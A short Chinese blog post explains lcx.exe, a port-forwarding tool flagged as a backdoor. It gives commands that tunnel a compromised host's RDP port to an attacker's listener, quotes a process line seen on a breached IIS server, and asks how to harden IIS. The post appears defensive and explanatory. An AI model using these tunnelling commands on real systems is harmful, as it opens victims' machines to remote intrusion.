用 virustotal 掃,說它是後門、遠端控制工具,google 上搜尋也把它跟 nc 同比,所以是類似的工具

怎麼用

攻擊端 (10.2.2.63)

lcx.exe -listen 33333 55555

肉雞端 (10.10.10.138)

lcx.exe -slave 10.2.2.63 33333 10.10.10.138 3389

可以用 mstsc 連 10.2.2.63:55555 成功遠端連線到 10.10.10.138,而不需用 10.10.10.138:3389 (前提是肉雞有開啟遠端連線功能),可以連但也要帳密才能登入

如果網站被丟到且執行了,或許在程序上會看到

"X:\RECYCLER\cmd.exe" /c X:\RECYCLER\lcx.exe -slave xx.xx.xx.xx 520 127.0.0.1 3389

是要把 IIS 應用程式的執行權限設成”僅指令碼” 嗎 ?

 

Related posts 相關文章
SessionManager 是一個躲藏在正常管道的 IIS 後門
More...
Sucuri 對 2021 年的回顧與 2022 的預測
More...
後門程式 Linux/Mumblehard
More...
CryptoPHP 後門藏在 WordPress 或 Drupal 等 CMS 的外掛或佈景裡面
More...

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。